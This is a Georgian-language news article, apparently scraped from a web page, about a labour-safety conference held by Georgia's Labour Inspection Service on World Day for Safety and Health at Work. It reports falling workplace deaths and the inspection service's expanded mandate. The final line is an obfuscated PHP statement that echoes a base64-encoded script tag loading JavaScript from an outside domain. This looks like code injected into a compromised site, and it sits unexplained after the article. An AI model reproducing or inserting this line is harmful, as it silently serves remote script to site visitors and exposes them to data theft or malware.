celsiusi
ავერსი საქკაბელი
28 აპრილი სამუშაო ადგილებზე უსაფრთხოებისა და ჯანმრთელობის დაცვის მსოფლიო დღეა. თარიღთან დაკავშირებით, შრომის ინსპექციის სამსახურის ორგანიზებით ჩატარდა კონფერენცია სახელწოდებით - „შრომის უსაფრთხოება და უფლებები საქართველოში“. ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს ჯანდაცვის უწყებიდან აცნობეს. 
 
მათივე ინფრომაციით, ღონისძიება დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრმა ზურაბ აზარაშვილმა გახსნა. როგორც მინისტრმა განაცხადა 2021 წელს, წინა წლებთან შედარებით სამჯერ არის შემცირებული სამუშაო ადგილებზე, უბედური შემთხვევის შედეგად გარდაცვლილთა რაოდენობა.
 
კონფერენციაზე ქვეყანაში შრომის უფლებებისა და უსაფრთხოების მიმართულებით არსებული ვითარება და მიღწეული შედეგები განიხილეს.
 
შრომის ინსპექციის სამსახურის ხელმძღვანელმა ბექა ფერაძემ განხორციელებული ინსპექტირებების ანალიზი და სამსახურის სამომავლო გეგმები წარადგინა. ბოლო წლების განმავლობაში მიღებული საკანონმდებლო ცვლილებების შედეგად, გაძლიერდა შრომის ინსპექციის სამსახური. გაზრდილი მანდატის ფარგლებში უწყებას მიეცა შესაძლებლობა ზედამხედველობა განახორციელოს ისეთ მნიშვნელოვან საკითხებზე, როგორიცაა დისკრიმინაცია, სექსუალური შევიწროება, იძულებითი შრომა, შრომითი ექსპლუატაცია და სხვა. 
 
შეხვედრას დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრის მოადგილე თამარ ბარკალაია, ევროკავშირის დელეგაციისა და შრომის საერთაშორისო ორგანიზაციის წარმომადგენლები, ასევე სხვა საერთაშორისო და სოციალური პარტნიორები ესწრებოდნენ.
 
 
 
722
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");